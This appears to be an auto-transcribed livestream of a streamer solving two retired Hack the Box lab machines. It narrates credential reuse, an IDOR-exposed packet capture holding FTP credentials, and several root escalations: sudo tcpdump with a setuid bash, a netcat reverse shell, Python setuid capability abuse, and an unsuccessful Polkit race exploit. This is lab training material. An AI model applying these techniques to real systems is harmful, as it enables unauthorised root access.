Is that working? Yes. All right. Probably need to bring that up. Want that to be at 10. Yeah. Is that better? That is better. All right. A bit more. Hello? That's better. Alright, does that peak too much? No. Oh, we took it all out. Put you down here. 15. Is that better? Yes. All right. I think we have that sorted. All right. So, welcome to tonight's stream. It has been a while since I actually have streamed, and life has been busy. Welcome, Arno89. As I was saying, it's been a while since I've streamed. It's been a few weeks. I was meaning to do this weekly, and it's just been life in the way. And then in the last week, we've had a cyclone come through Brisbane, southeast Queensland in Australia, and it's just, we were out without power for about 24 hours. Wasn't too bad, but just messy, just raining the whole time. So I'm happy to be back doing this. I want to finish this machine, potentially start a new one. In a few minutes, I'm going to have to go say goodnight to my son because he's about to go to bed. But let's get started, I guess. So if you... One second. Let me just get this right. So let's do this so that doesn't cut. We'll remove you. We will add a input. That there. I really apologize for this. All right, away transition. Can you hear me fine there? Let me know. I think that should work now. Oh, great. All right. I apologize for that. So if you did, when you didn't catch that, what I was saying was this machine covers the Apache Struts vulnerability, file upload logic flaw in Apache Struts. You can upload a malicious file that can give you remote code execution. Basically, you basically mess with one of the interceptors that Apache Struts uses to do the function of the file upload, and you can kind of bypass some of the restrictions there through it. And so then when it does that, it can process the file and then get you remote code execution. It's a pretty fun one. I'm hoping eventually to do kind of a deeper dive video into the vulnerability, showcasing it based off this box, because, you know, I don't wouldn't have to set up my own environment. I've got Hack the Box here and kind of demonstrate it in a little bit less of a raw kind of way and a little bit more explained well. So, as I was saying, we're doing that machine. The current thing that I'm using is I've used virtual machines for a long time. Obviously Kali, I haven't used Parrot too much, or Black Arch or Commando VM, but I discovered this project called Exegol. And Exegol, basically what it does is it containerizes your whole pen testing distro into Docker containers and then puts a Python wrapper around it and then serves it up in as like one lightweight system. It has freaking everything you could want in a pen testing distro. Whether you do CTFs like pretty regularly or if you do pen tests and that kind of thing, Exegol is a fantastic resource and alternative to like your Kali or your Parrot. I found it to have really good, a really good setup. It touts itself as the professional hacking setup. I'm still like kind of in the testing phase. I want to use this for 6 to 12 months before I make a decision on whether I think this is the tool to go for me. There are a few kinks that it's just a bit different to Kali, and how a virtual machine runs and how you install stuff is just a little bit different. But it is an awesome tool. It's a bit finicky to install on Windows because you have to have Docker Desktop and WSL and Python, and it's just a bit weird. But once you get it up and running, it is a dream. I really like it, and it does this really cool thing where you can virtualize, like it. You can like open up Firefox and stuff, and it will forward the GUI to your host machine, and you can access the file system from your host machine in the virtual machine and vice versa, but still keeping some separation, which is really, really cool. Anyways, this video isn't about this Exegol. That's something that I want to talk about in the future, but it's a really cool tool. I've came across it maybe a year ago, didn't really pay attention to it, and then the last few months I've been messing around with it. I pretty much do like the seasonal boxes or any like Hack the Box Academy or any labs or anything. I do it solely in this. Sometimes I will go to Kali if there's something that hasn't been ported over pretty quickly and easily, but that's just me just being lazy. Yeah, so it's cool. I like it. It's pretty epic. So what we came here tonight was to do the Strutted machine. Now let me just check the time and make sure that my kid isn't, he'll be going to bed in a second. But we have got remote code execution. We found the credentials for the James user. They were being reused on the Tomcat web server, and now we were able to log in using SSH to the Strutted machine. A couple of things we want to do. We want to check environment variables for some privilege escalation, see if there's anything in here like API keys or password or anything like that that might be helpful to us. We also want to check I'm going to see the Etsy password file just to see if there's any other users that may be of interest in here. So we have our Tomcat, and he's at 1000. I don't think I see. We have our root user, obviously. But apart from that, we don't really have any other users that we would want of interest. Now the next obvious thing that we do is sudo -l, and we have a no password TCP dump. Now what I'm going to do is I want to check see if we have, let me just chuck this over here. That's not working. Come on. There we go. All right. GTFO bins, because they might have TCP dump. Okay, so a basic one. If the binary is allowed to run as a super user, it does not drop the elevated privileges. Let me just move this over here so you can read it. And may be used to access the file system, escalate, or maintain privilege access. So we can assign a command, tf make temp, and then we change that and then run this, and that will escalate our privileges. All right, so we'll go command ID. So this is just a proof of concept. Make temp, echo, command into the make temp, chmod plus x tf, then we do sudo tcp, let's do the full path just to make sure, user bin sbin. I'll chuck that down here so I can see it. User sbin tcp dump. All right, -ln -i hello w dev null w1 w -g1 -z tf -z capital Z root. All right, give me a second. I will be back in a moment. All right, I'm back. Okay. Cool. All right. Back. I don't know what this just did, so we're gonna explore it a little bit more because I'm a little bit confused. All right, so I do have a cat, but she's out there. All right, so we're looking at the TCP dump privilege escalation. So what I'm going to do is I'm going to have a look. I'm going to do, we don't have a manual entry. What? Is there a TCP with dump man? All right. All right, so we are looking at, so I know this is -ILO is local, the local interface. So if we do IPA, LO is the loopback one. That's like your 127.0.0.1 referring to yourself. -LN, what is that? -LN. Make standard outline buffered. Okay. That, and don't convert addresses. All right, so that makes sense. -W. Write the raw packets to a file rather than passing and printing them out. So that is that's why they put in dev null. So we don't want to put the raw packets in an actual file. We just pipe it to dev null and it gets dealt with there. File count used in conjunction with C. This will limit the number of files created to this specified number, which is 1. Using conjunction. If we use it with G, this will limit the number of rotated dump files that get created, exiting with status 0 when reaching the limit, which is that what we saw? Oh yeah. So we got the 1 file created there. Yeah, so we have the 1 file created there. What else do we have? We use the Z and capital Z. Proto-straight command used in conjunction with the -G options. This will make TCP dump run proto-straight command where file is the save file being closed after each rotation. For example, specifying -ZGzip will compress each save file using gzip. Note that TCP dump will run the command in parallel to the capture using the lowest priority so it doesn't disturb the capture process. And in case you would like to use this command that itself takes your flags, you can always write a shell script that will make the save file name as the only argument, making the file. Okay, and then Z is the user. Okay, so we're running sudo TCP dump we are, what was -L again? Okay, we're buffering it out. We are not converting addresses. We're saying use a loopback address as your interface. We're writing to dev null. We're doing it once. And then we're specifying the command, which is this. So we're making a temporary file. Is that what make temp does? Make temp command. We need a temporary file. Make temp provides a system-based way to create a valid and unique temporary file or directory from a script. So we make a temporary file, we pipe the ID command into the temporary file. We change it to execute, and then we run the command like this. So we could potentially change this to, say, chmod. So you could change that to like a chmod dash +s bin bash, like this. And then all we'd have to do then is just go bin bash -p, which would give us a root shell, potentially. So let's give that a go. So +s bin bash. It's hard because there's no like output that I can see from this thing. TF. Hang on a second. Let me get this back up because I don't remember. TF make temp equals make temp. And then what is that again? Echo command. Echo hang on a second, let me just check my environment variables and see if it actually added them, because I don't think it did. No, it's not even in there. All right, so command equals bin bash oh no, wait, that was chmod +s Oh, so it did work. Okay, so that did work. All right, cool. So if I did TF, all right, so if we do TF equals make temp, okay, so it worked. Echo, actually we'll do echo that into TF. Cool. Great, so we'll do that, and then we will go back up to this. So dash P. No, that didn't work. Is it because I didn't change? Did I forget to change the permissions? There we go. So echo df. Okay. Let's try that again. Oh, still in the previous shell. Okay. Let's try this one more time. So we go do this. No. We set it like this. We do the TF. Then we echo command into TF. All right. Let me just check that again. Yep. Oh, and we gotta have our quotes. That chmod plus x tf. Yep. And then we do our sudo. That. So now that will run. That's done that. Bash dash p. And we got it. Boom. All right. So even though here it says James, the effective user ID and group ID is root. So who am I? Root. So then we can go to the root folder and we have the root flag. So that's one way to escalate there. Like obviously you can use within this command here, you can set this to anything. If you wanted to do a reverse shell, like we can do that. In fact, we could try, we'll exit that, we'll clear. So we'll go back up and we'll do that. So let's get my trusty friend rev shells. Reverse shell generator, what's our IP is so we'll do that, and we want bin bash. All right, so copy that. Let's start netcat. So we'll start a netcat thing there, and we'll paste that into there. Then we will again set, because we have to reset everything so it works. That echo command into TF, and then change the setting, the permissions to execute, and we'll go back up. Hopefully, if this works, if my theory is right, it will execute the end there. Bad FD number. What is that? That's the right thing. Do we have? We have netcat. Does it have the... Okay, we can use... Might be able to use BusyBox and netcat together. Give that another go. All right, so do that. Save us from retyping everything out again. All right. Oh, okay, so we've got a connection. And we do have a shell. So let's try what I'm going to do, because I don't get to do this very often, is I'm going to try to upgrade this shell. Potential. No, I'm not going to be able to do that actually. I don't think. Doesn't have Python. Oh, it does have Python 3. I think it was in shells and payloads. Been doing a ton of Hack the Box. Things, and I just don't remember where I saw it. Is it getting started? Probably. Here we go. Reverse shells. Pine shells, web shells. Upgrading our shell. So, just move that here. Python 3. -c import pdy dot spawn that bin bash. There we go. All right, so that upgraded my shell. And this is where I have a problem with Exegol, as I can't background this without it backgrounding the whole of Exegol and then putting me back onto PowerShell, which is a little bit annoying. I still haven't figured out how to do that, whether I need to change my hotkeys within PowerShell because I don't really use the backgrounding feature or not, but export term x term 256 color. Okay, so we have some color there. Cool. So that's basically it. That's kind of what I wanted to do with this thing. We might need to start a new machine, I think. What do you guys reckon? We start a new machine? I guess we can start a new machine since no one is saying anything. That's all right. All right, so let me just sort out my life for a second here. So let's kill this one. Put this back on here. Let me kill this one. We will clear. And all right, so I reckon we pick a machine. Probably keep that. Gonna go to the retired machines. So we'll sort by easy and medium. Not really sure. Can finish off this greenhorn machine. I don't remember this machine. It was ages ago. Like I did the user flag when it was still active and it's been inactive. Like it's been retired for a while. Can do that. Can look at the new tracks. Let me have a look at these tracks. Hack the Box has started to update some of their like these track things, which is really cool because they've changed like some of these like active directory exploitation. They've changed them because it used to be like a bunch of different machines for the AD 101 and made them kind of, I don't know, just new ones. So we could do something like that. Intro to Red Team. A bunch of these are Linux boxes. Could do one of these like 80 machines. It's in these hottest CVEs. And these are all CV machines. Cloud track. Maybe we'll just do this cap one. Kind of had this one on my list previously. Let's do it. Let's do it. All right. Let's get the image, because I like to use the image in my notes. Got it. And we'll come HTB image link. Put that there. And we'll do cap. Is that visible for you guys? Don't know if it's too small. All right, let's fill in this information before we start. We'll go to adventure mode for now. So it is that. It's an easy machine. It's a Linux. And it's on Hack the Box. All right, let's run our network, our nmap. So we'll make the cap. Okay. Dash A dash minimum rate is 5,000. That's just because we're on a Hack the Box machine. We're not really spending 1,000 hours waiting for this thing to do its thing. So I'll explain the command. So dash p dash is scan all ports. We're doing an aggressive scan, which does your default scripts, your version enumeration, and a bunch of other things, and operating system enumeration. We're doing a minimum rate of 5,000 packets a second, which is very hefty. You don't want to be doing this in a proper pen test, because that would just, your client would not be very happy. And dash V for verbose, because I like to see what's happening and when it's happening. All right, so we have port 21, port 80, port 22. So you just have 3 ports open. So that will be FTP, SSH, and HTTP. And because we'll probably do HTTP, we will open up Firefox. Actually, I already have one open, so got that there. And I'm going to open up Kaido. All right. Okay, let's delete all of this because we don't need it. Alrighty. yes, this is taking a little bit. Roughly 53 seconds remaining. All right. We want to echo cap.htb into Etsy hosts. All right, so now it's just doing its script scan there. And we can probably go to cap.htb. All right, so we have some sort of dashboard. So we have copyright 2021, template by colorlib. Looks like a WordPress thing. This is a security dashboard. We have a IP config here, a network status. So this is just the output of a couple of commands. Message, nothing, settings. This is weird. Go home. All right, so we have some sort of security dashboard there. Let's see if we can have a bit of a more interesting view here. So we have an FTP server, OpenSSH, as usual, Gunicorn, HTTP server. I have never heard that kind of server before. Did that not resolve to... Yeah, so it's a security dashboard. All right, so let's make this a bit smaller so I can copy it over. So I'll copy that over to here. I'm just going to do another quick scan of port 80 because I just want to make sure that it's got the right information now that we added cap to Etsy hosts. And we will fuff .10, what was that? 245 fuzz, and we want directory go medium. So what happens on the back end when we request like netstat? Just does there's just a bunch of different stuff there. That's different. So we have the capture will redirect us to this data 4, and then data 4 takes us here, which is just the dashboard. So what I think we're going to do just trying to see if there's any information that might give us a hint as to what kind of technology this is. That's not what I wanted. We don't have that. All right, back to dashboard. So a bunch of JS stuff, script. See if we can find the first occurrence of script. That's that. Side menu, slim scroll, sticky, header, form, data table active. Screen pave. Okay, so that's not super helpful. Okay, so what did that do when I searched? But what did that do? So if I search IP, did that show up anywhere? So if we look for IP, oh, that's not a helpful one. Let's search for Billy Bob. And then go to here, we will search for Billy Bob. And there's nothing. So it doesn't show up. But there might be an injection there. Let's see how this is going. So we have data, capture, but data did have, where are you? Sorry, let me just go back here. So capture redirects us. Oh, and we can download a PCAP. What did that do? So if we go and replay that, we do a 7. just hangs, but oh, no request found. What? Ah, so that's capturing what I've done. So if I go to 0, we could potentially get some like information disclosure. There's Nathan as a user and a password. That's really helpful. So we've got a username and a password here. So let's take a screenshot of this. Put that in here. So port 80 HTB. Let's take some notes. All right. Let me just copy that screenshot in first. All right, so there is a web server running a security dashboard with the user Nathan logged in. Now, I'm not sure if that's supposed to be intended. Who knows? But it was there. I'll take a screenshot of that. And we'll do that. Going to the security snapshot page gives us the option to download a PCAP file. There is an idle in the downloads. So an idle is an insecure direct object reference. And it's insecure because we could download the file. We could reference the direct object just by the file number and then get it. And so then we were able to get the password. Let me just make sure. Yeah, so this is for FTP because we have port command successful, consider using passive, so that's passive mode. And then this here comes directory listing. That was something else that was like typical. So we know there's a notes.txt. And what else? I think that's it at the moment. All right, so we will copy this. This led to requesting a PCAP with credentials stored in it. So that is that password, and Nathan is the user. Nope. All right. So we have a port 21 and a 22. So SSH and FTP. All right. So now what we'll do, let's see if this gave us anything else that was super helpful, but I don't think it will, because I have a feeling that that's kind of, yeah, that's the same. All right, so we want to FTP Nathan 10 245. What? Then, and what was our password? All right, so we're in here and we have our user text and snap. All right, so this connects straight into the, what's it called? Into the user's directory. So if we just SSH Nathan 10 10 10 245, sign our life away, then we have a shell and we have user. Which is insane. That was really quick. Yeah, that's crazy. That felt really quick for me. Like, I usually spend a while fumbling around through that. So we've got our user flag, and now we will need to escalate to root. So we'll do the sudo -l as usual. There we go. So can't use sudo to do stuff. We'll do our typical env. We'll go ls/home. So we just have one user that's that we need to be as to then escalate. So I'm confused why we have an FTP server. Okay, profile. Don't think that needs anything. Cat bash. Nothing there. cd.cache. And that's just your typical mottd legal display, which is nothing helpful. Pretty sure bash, yeah, bash issue goes into dev null. We have some keys there. don't think that's helpful. All right, I think I'm going to have to get Linux, what's it called? LinPs? Unless do I have it on here? That is awful. No. Was it LinPs? No. Alright, so we'll just have to download LinPs onto this machine. This is always super confusing for me. Ah, there it is. Alright, so we just... just have a random question from someone watching. Continue this box in a second. It says, I want to add cubes on Hack the Box. Can you explain how to get views? Basically two ways. You can either complete modules and that will give you cubes at the end. Obviously, if you pay like 50 cubes for a module, you get like 10 back, 100, sometimes you get 20, that kind of thing. And the other way is to actually just pay for them. So if you've got a student account, you can get pretty much the whole CPTS path for the $8 a month, plus the CBBH and the CDSA learning paths. Everything tier 2 and down you can get for $8 a month when you're a student. If not, you have to pay cubes. It's a little bit more, like, some people find it confusing. I don't really. I don't know why. I just don't. Let me just log into my account and then we can have a quick look together. Let me just copy this over while that's happening. All right, so we have that, Python, -m. Curl. ten 1437/lin.sh. All right. So we will just let that run and we'll talk about this. All right, so this is my Hack the Box account. Basically, can you see that clearly? Yep, cool. So if you go just to billing, you will get the different plans. Basically, you can get like an annual, which is like an access basis. So if you're not a student, this is kind of the cheapest way to do it. $490 a year will give you the certification voucher plus access to everything tier 2, which is like tier 2 and below. So that's the CPTS, CBBH, SOC analyst paths, and then any other thing. So like all the Wi-Fi hacking stuff that's coming out, the AI red teaming stuff that's coming out, all of that kind of stuff is also part of that. So pretty much anything that's tier 2 and below, that's kind of like your best bet, especially if you decide, okay, this year I'm just going to spend all of my time just working through the Hack the Box content. You can pretty much make your money back on the effort there. $4.90 is a lot. Like, it's $4.90 US. Like, that's, for me, that's a lot of money. But I would say it's worth it in terms of if you're not a student. If you are a student, then you can do the $8 one. And then after that, you can either sign up on a monthly basis and get a certain amount of cubes per month, or just pay for the cubes outright. It's cheaper to do this, to sign up on, like, say, the cheapest option in terms of value for money is the platinum one, because you get 1,000 cubes for $68, whereas 1,000 cubes on its own is $100. So you're saving like $32 on the cubes. And then it also gives you like the Pwning box as well, which is helpful. Like, if you don't want to be spinning up a VM or you don't have the hardware for it, it's really helpful to do that, especially if you're spending a couple of hours doing it per day. That's pretty much your options. You can either go through a month by month payment basis, and you have to wait to unlock more cubes, plus the cubes that you unlock like as you do the modules, or you just pay for the actual cubes themselves. I don't know why they did it this way. I don't find it super confusing. I know some people do. It's a weird way. It's a weird system. I don't know why they didn't just do like tier-based access, tier 1, tier 2, tier 3, and you can just pay, or just do one subscription for everything. That's just how they've designed the system. Yeah, but in saying that, like, you can, like with the different modules that are available, you get like stuff back. So say you unlock this 1,000 cube module, you get 200 back by the time you finish it. So you go through the whole thing, it's huge, it's massive, you do all of the skills assessment and all of that, but then by the end of it, it ends up being only 800 cubes, because you get 200 back. So every single one you get cubes back for. I don't know if that makes sense. You're welcome. All right, let's see. So this is finished. Let's go through so you can find the top. And we have our P. All right. So we have ping, bash, and netcat. Sudo version is 1.8.31, but we're not allowed to use sudo. Nothing interesting there. These exploit suggestions, I've never really found this super helpful. This says it's vulnerable to CVE 2123, 213560. So I'm gonna take note of that, because when it goes red and yellow, usually it's pretty certain that that's a thing, that it's vulnerable to it. Okay. Nothing so far. This stuff is crons. Nothing interesting. Just get that formatting a bit better. Okay, so you got your typical sockets listening. One interface, nothing on the host file that's interesting. No internal things apart from DNS, but that's just like your standard thing. Nothing there. What else do we have? Our useful software that we can use. We have G++, GCC. So public archive for our FTP server. So these are commented out, so they can't be done, but local enabled, yes. Anonymous enable. These are your standard like password files. We permit root login through SSH. Nothing super interesting from the SSH file. Checking any SUID. Nothing there. No. We have a capability here for Python with this, so we will need to look that up. With capability. Apparently vulnerable. Right. Not sure what else. Nothing else is standing out to me so far. We've only got a little bit left. Yeah, so that's pretty much it. So we can look at those two things. Let's have a look what this is. What is that? It was found that Polkit could be tricked into bypassing the credential checks for dbus requests, elevating privileges of the requester to the root user. This flaw could be used by an unprivileged local attacker, creating new local administrator. The highest threat from this vulnerability is to data confidentiality, as well as system availability. So this is a 7-year-old bug. Describe in this section depends on two packages: account service and home control center on a graphical system. So this seems quite complicated for an easy box. So we'll return to this if it doesn't look like this is dang it. Okay, exploiting capabilities. So what do we have here? Capability set UID, netbind, service, and EIP. So okay, so this is a dangerous capability. Okay. The following command can be used to identify binaries that capability allocated to them, whereas the following command can be used to check whether running process capabilities assigned. Blah, blah, blah. The easiest way to identify misconfigured is to enumerate using linpiece, which is what we did. Okay, so based on the output from the commands used above, has the set UID capabilities, which allows us to set the effective user ID of a process when running its binary, executing binaries as root. So according to GTFO bins, it can be easily exploited with the following command. So if we went over here, nope, and did Python capabilities. All right, if a binary has these capabilities set, UID capabilities set, or is executed by another binary with a capability set, it can be used as a backdoor to maintain privilege access. So we can do CP which Python, which Python 3.8? Yep. So that's the one. Is that the one with the? Yep. So we need to where are you? There you are. Oh, okay, so it's already, this is just to set it up and to see how the capability abuse works. So if we just do user bin Python 3.8 -c import os.set UID, set UID to 0, os.system bin bash, because who wants to do sh? Who wants to do sh? And that's it. Huh. Are you serious? Cd root. And we just rooted that within like 20 minutes. That was a nice, easy box. I liked that. And I learned something. Cool. That was fun. That was pretty fun, yeah. Hello, curiously, we just finished a machine. So, welcome to the party. Cool. Oh, wow, that was fun. I like that one. That was very easy. Sometimes I find that I haven't tried the polkit exploit. I mean, we can give it a go. I don't know if it's going to be if it's going to work, but all right, maybe let's just have a look through and see if we can understand what's going on. So it's triggered by starting a dbus send command, but killing it while polkit is still in the middle of processing the request. Let me just exit out of that. I like to think that it's theoretically possible to trigger smashing see at just the right moment, but I've never succeeded. First, you'll need to measure how long it takes to run dbus command normally. So we do that. Something like this, that took 16 milliseconds. So mine was 9 milliseconds. I need to kill dbus approximately 8 milliseconds. So 4. Let me just make this bigger so I can actually see. Where are you? There. So is that, let me just put this in here. Okay, so I need to change that there to be like 4. So we want it to be faster. All right. You might only need to run that a few times. You might need to experiment with the number of milliseconds in delay. When the exploit succeeds, you'll see new user name Boris. All right, so did that work? Did it work? So I'm confused. So change this. This is, I don't even know what this is. Let me have a look. Better. Let's see. Is this it? When trying to create the user, we got a message with permission denied. Okay, so we need to create. We sent the dbus message in a background job. We then told it to sleep then kill the process. This successfully created the new user, adding them to the pseudo group. Okay, so I don't know if this is working. What? So they make a thing with a certain amount of milliseconds? No, I don't think it's going to work. Because okay, so it didn't actually make a user. This is supposed to make a Lucas. Oh wait, no, that's... No, so it didn't. Yeah, because it doesn't make a user here. So we'll do that. No. No. It did say that it needed to happen a couple of times for it to work because it is a race condition, but I just don't think it is vulnerable because I'm pretty sure this machine came out, when was it released? 2021, June 2021, and this, it came out the same year. Where are we? Yeah, no, it doesn't make a user. Let's try Billy. ID Billy. No. Is it because my thing is too quick? No. Yeah, that's what I'm thinking. They might be patched. Yeah, I don't think it's vulnerable to the Polkit thing, because it doesn't look like it's. June 3rd is when it was fixed, and this was released June 5th. I reckon it probably got released. Some people exploited it, like when it first became active, and then they patched it so that that isn't the method of exploitation, like privilege escalation. Plus, judging by the like name of the box being cap, like that would make more sense if it was about capabilities rather than that. I wonder whether the write-up has anything. No. There's literally just the Privesc. They use Wireshark to look at the file to get the, what's the thing called? To get the PCAP files. Cool. Alrighty, well, it's been fun. We got Strutted finished. We did cap. Got it done within one sitting, within about 20 minutes. That was pretty fun. I'm hoping to stream weekly from now on Saturday nights, and just do what we did tonight. Go through a machine, that kind of thing. I may potentially do some sort of standalone video to start off with, kind of going through something that I'm learning or something that I think may be helpful. And then we kind of go from there and do a machine. My aim is to do at least a user and then root, but time permitting, we'll see how we go. Anyways, thanks for joining me. It's been really fun, and I will see you in the next one. Have a good night.